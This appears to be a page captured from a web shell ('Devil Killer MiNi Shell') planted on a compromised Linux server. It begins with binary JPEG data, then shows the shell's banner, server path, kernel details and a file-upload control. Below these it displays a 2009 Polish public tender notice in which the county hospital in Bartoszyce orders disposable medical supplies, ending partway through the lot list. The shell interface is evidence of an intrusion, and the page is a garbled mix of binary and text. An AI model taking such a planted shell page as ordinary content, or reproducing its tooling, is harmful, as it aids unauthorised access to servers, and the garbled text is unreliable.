JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090116/18959-N-2009.html

<p class="kh_header"><b>Bartoszyce: Dostawa sprzętu jednorazowego użytku, nr sprawy: 01/2009.</b><br>
<b>Numer ogłoszenia: 18959 - 2009; data zamieszczenia: 16.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Powiatowy im. Jana Pawła II , ul. Kardynała Stefana Wyszyńskiego 11, 11-200 Bartoszyce, woj. warmińsko-mazurskie, tel. 089 7642625, 7649484, faks 089 7642625.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bartoszyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu jednorazowego użytku, nr sprawy: 01/2009..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia składa się z 26 zadań:
3.1 Przedmiot zamówienia w zakresie zadania nr 1 dotyczy Zadania nr 1.
Dostawa cewników i zgłebników żołądkowych - 28 101 szt.
33.14.12.00
 3.2 Przedmiot zamówienia w zakresie zadania nr 2 dotyczy Zadania  nr 2.
Dostawa pojemników, pałeczek do pobierania wymazów, testów do wykrywania Helicobacter pyroli, szczoteczek do pobierania wymazów cytologicznych, zestawów do kontrolowanego odsysania - 6 970 szt.
33.19.00.00-8
 3.3 Przedmiot zamówienia w zakresie zadania nr 3 dotyczy Zadania  nr 3.
Dostawa szkiełek podstawowych z polem matowym - 4 000 szt.
33.19.00.00-8
 3.4 Przedmiot zamówienia w zakresie zadania nr 4 dotyczy Zadania  nr 4.
Dostawa plastikowych butli do drenażu jamy opłucnej - 100 szt.
33.19.00.00-8
 3.5 Przedmiot zamówienia w zakresie zadania nr 5 dotyczy Zadania nr 5.
Dostawa kateterów kateterów do drenażu klatki piersiowej z trokarem i zestawów medycznych - 360 szt.
33.14.16.20-2
3.6 Przedmiot zamówienia w zakresie zadania nr 6 dotyczy Zadania  nr 6.
Dostawa strzykawek jednorazowego użytku, igieł jednorazowego użytku, łączników, strzykawek, przedłużaczy do pompy infuzyjnej i przyrządów do przetoczeń krwi - 530 600 szt. 
33.14.13.10, 33.14.13.20, 33.19.00.00-8
 3.7 Przedmiot zamówienia w zakresie zadania nr 7 dotyczy Zadania nr 7.
Dostawa pojemników na zużyte igły, pojemników do zbiórki moczu, pojemników do transportu moczu, kaczek plastikowych męskich, basenów plastikowych, basenów papierowych jednorazowego użytku i kaczek papierowych jednorazowego użytku - 40 020 szt.
33.19.00.00-8
 3.8 Przedmiot zamówienia w zakresie zadania nr 8 dotyczy Zadania nr 8.
Dostawa papieru do aparatu USG, papieru KTG, papieru do aparatu EKG, papieru z nadrukiem do aparatu EKG i kabla do aparatu EKG - 1680 szt.
33.19.00.00-8
 3.9 Przedmiot zamówienia w zakresie zadania nr 9 dotyczy Zadania nr 9.
Dostawa różnych produktów medycznych - 64 650 szt.
33.19.00.00-8
 3.10 Przedmiot zamówienia w zakresie zadania nr 10 dotyczy Zadania nr 10.
Dostawa pielucho - majtek dla dzieci pielucho - majtek dla dorosłych - 23 800 szt. 
33.19.00.00-8
 3.11 Przedmiot zamówienia w zakresie zadania nr 11 dotyczy Zadania nr 11.
Dostawa szyn kremera i szyn aluminiowych - 410 szt.
33.19.00.00-8
 3.12 Przedmiot zamówienia w zakresie zadania nr 12 dotyczy Zadania nr 12.
Dostawa zestawów do kolografii z barytem - 90 szt.
33.14.16.20-2
 3.13 Przedmiot zamówienia w zakresie zadania nr 13 dotyczy Zadania nr 13.
Dostawa kapsli do butelek do sterylizacji gazowej, korków do butelek do sterylizatora gazowego - 800 szt.
33.19.00.00-8
3.14 Przedmiot zamówienia w zakresie zadania nr 14 dotyczy Zadania nr 14.
Dostawa masek tlenowych i przedłużaczy do tlenu bez maski - 630 szt.
33.15.71.10-9
 3.15 Przedmiot zamówienia w zakresie zadania nr 15 dotyczy Zadania nr 15.
Dostawa różnych urządzeń i produktów medycznych - 1415 szt.
33.19.00.00-8
 3.16 Przedmiot zamówienia w zakresie zadania nr 16 dotyczy Zadania nr 16.
Dostawa oleju do narzędzi - 48 szt.
33.19.00.00-8
 3.17 Przedmiot zamówienia w zakresie zadania nr 17 dotyczy Zadania nr 17.
Dostawa drenów - 420 szt.
33.14.16.40-8
 3.18 Przedmiot zamówienia w zakresie zadania nr 18 dotyczy Zadania nr 18.
Dostawa podkładów celulozowych z perforacją co 40 cm - 1500 szt.
33.19.00.00-8
 3.19 Przedmiot zamówienia w zakresie zadania nr 19 dotyczy Zadania nr 19.
Dostawa pisaków do rejestratora w sterylizatorze gazowym - 10 szt.
33.19.00.00-8
 3.20 Przedmiot zamówienia w zakresie zadania nr 20 dotyczy Zadania nr 20.
Dostawa igieł do punkcji mostka - 100 szt.
33.14.13.20
 3.21 Przedmiot zamówienia w zakresie zadania nr 21 dotyczy Zadania nr 21.
Dostawa gazu - tlenku etylenu 100% 134g - 330 szt.
24.11.15.00-0
 3.22 Przedmiot zamówienia w zakresie zadania nr 22 dotyczy Zadania nr 22.
Dostawa nakrętek na kanał krwi i nasadek na kanał dializatu - 1 200 szt. 
33.19.00.00-8
 3.23 Przedmiot zamówienia w zakresie zadania nr 23 dotyczy Zadania nr 23.
Dostawa zestawów do pobierania wydzieliny z drzewa oskrzelowego - 800 szt.
33.14.16.20-2
 3.24 Przedmiot zamówienia w zakresie zadania nr 24 dotyczy Zadania nr 24.
Dostawa soli w tabletkach pakowana po 25 kg - 15 000 kg
14.43.00.00
 3.25 Przedmiot zamówienia w zakresie zadania nr 25 dotyczy Zadania nr 25.
Dostawa nebulizatorów 950 szt.
33.14.16.20-2
 3.26 Przedmiot zamówienia w zakresie zadania nr 26 dotyczy Zadania nr 26.
Dostawa rękawiczek jednorazowych - 5 000 szt.
18.42.43.00-0.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8, 33.14.13.10-6, 33.14.16.20-2, 33.14.12.00-2, 33.14.13.20-9, 14.43.00.00-4, 33.14.16.40-8, 18.42.43.00-0, 24.11.15.00-0, 33.15.71.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 26.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
 Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:

 [x]   A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę 
 [x]   A.2) Formularze cenowe w zakresie wybranych przez wykonawcę zadań od 1 do 26 - wypełnione i podpisane przez wykonawcę 
 [x]   A.3) Wzór umowy  - parafowany przez wykonawcę 

B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:
 
 [x]   B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
 [x]   B.2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  
 [x]   B.3) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
 [x]   B.4) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 i 24 Prawa zamówień publicznych.   

 [x]   C.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 

 [o]   C.1) Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z dokumentami potwierdzającymi, że dostawy lub usługi te zostały wykonane należycie.  

 [x]   D.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty: 
 [x]   D.1) -Polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.  

E. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
 [x]   E.1) Zamiast dokumentów, o których mowa w pkt. B.1),B.3) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
 
 [x]   -Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. E zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. E.   

F. Dokumenty wymagane w przypadku składania oferty wspólnej: 
F.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy

 [x]   - Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. B dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie   

G. Postanowienia dotyczące składanych dokumentów
G.1 Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.
G.2 Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-bartoszyce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek Wykonawcy Specyfikację istotnych warunków zamówienia można uzyskać: specyfikację można pobrać ze strony internetowej  Zamawiającego lub osobiście w siedzibie Zamawiającego, pokój A14..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2009 godzina 12:00, miejsce: Szpital Powiatowy im. Jana Pawła II
Wyszyńskiego 11
11-200 Bartoszyce
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadania I.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa cewników i zgłebników żołądkowych - 28 101 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadania II.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pojemników, pałeczek do pobierania wymazów, testów do wykrywania Helicobacter pyroli, szczoteczek do pobierania wymazów cytologicznych, zestawów do kontrolowanego odsysania - 6 970 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadania III.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa szkiełek podstawowych z polem matowym - 4 000 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadania IV.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa plastikowych butli do drenażu jamy opłucnej - 100 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadania V.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa kateterów kateterów do drenażu klatki piersiowej z trokarem i zestawów medycznych - 360 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadania VI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa strzykawek jednorazowego użytku, igieł jednorazowego użytku, łączników, strzykawek, przedłużaczy do pompy infuzyjnej i przyrządów do przetoczeń krwi - 530 600 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6, 33.14.13.20-9, 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadania VII.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pojemników na zużyte igły, pojemników do zbiórki moczu, pojemników do transportu moczu, kaczek plastikowych męskich, basenów plastikowych, basenów papierowych jednorazowego użytku i kaczek papierowych jednorazowego użytku - 40 020 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadania VIII.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa papieru do aparatu USG, papieru KTG, papieru do aparatu EKG, papieru z nadrukiem do aparatu EKG i kabla do aparatu EKG - 1680 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadania IX.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa różnych produktów medycznych - 64 650 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadania X.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pielucho - majtek dla dzieci pielucho - majtek dla dorosłych - 23 800 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadania XI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa szyn kremera i szyn aluminiowych - 410 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadania XII.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa zestawów do kolografii z barytem - 90 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadania XIII.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa kapsli do butelek do sterylizacji gazowej, korków do butelek do sterylizatora gazowego - 800 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadania XIV.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa masek tlenowych i przedłużaczy do tlenu bez maski - 630 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.71.10-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadania XV.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa różnych urządzeń i produktów medycznych - 1415 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadania XVI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa oleju do narzędzi - 48 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadania XVII.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa drenów - 420 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
